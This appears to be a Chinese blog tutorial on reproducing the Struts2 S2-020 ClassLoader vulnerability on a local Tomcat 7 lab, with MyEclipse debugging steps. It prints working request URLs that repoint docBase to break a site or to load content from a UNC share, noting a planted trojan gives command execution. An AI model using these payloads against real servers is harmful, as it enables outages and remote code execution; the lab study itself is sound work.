struts2漏洞重现与编译

struts2 S2-020重现以及myeclipse调试classLoader详解<br>1、环境：myeclipse 2013，tomcat 7<br>2、classLoader属性值动态查看：<br>&nbsp;&nbsp;&nbsp;2.1、 将源码导入到myeclipse，源码下载地址：http://pan.baidu.com/s/1bnGq4wf<br><br>&nbsp;&nbsp;&nbsp;2.2、设置myeclipse 下通过tomcat7运行<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2.2.1、windows->Preferences->myeclipse->Servers 单击Tomcat 7.x将Disable修改为Enabled,将'Tomcat home directory'设置为tomcat的路径。展开Tomcat 7.x树。点击“JDK"，增加jdk路径路径为jre1.8.0_25路径，点击"Paths"->”Add JAR/ZIP“,增加tomcat7.0/bin/tomcat-juli.jar,保存。<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2.2.2、windows->show view ->Variables<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2.2.3、设置index.jsp断点<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2.2.4、通过Tomcat 7.0运行调试<br><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2.2.5、打开浏览器，访问http://127.0.0.1:8080/strutstest4/index.action，单步执行，查看Variables窗口变量，如下图所示，即可动态查看classLoader的属性值。如下图所示。<br><br>3、s2-020漏洞重现<br>&nbsp;运行项目，浏览器输入<br>原根路径为<br><br>C:\\Users\\yangxianqu\\Downloads\\apache-tomcat-x86_veryhuo.com\\<br>apache-tomcat-7.0.52\\webapps\\strutstest4<br><br>访问<br><br>http://127.0.0.1:8080/strutstest4/index.action?class.classLoader.resources.dirContext.docBase=C:\\test\\这个不存在的路径之后，之后访问任何页面访问都会是404。重新编译运行该项目，方能恢复正常<br>访问UNC目录<br>访问：<br><br>http://127.0.0.1:8080/strutstest4/index.action?class.classLoader.resources.dirContext.docBase=\\127.0.0.1\pmc\，则打开任何页面实际上访问的是\\127.0.0.1\pmc\目录下的pmc这个项目。只要\\127.0.0.1\pmc\目录下放个任意木马文件，则达到命令执行效果<br><br>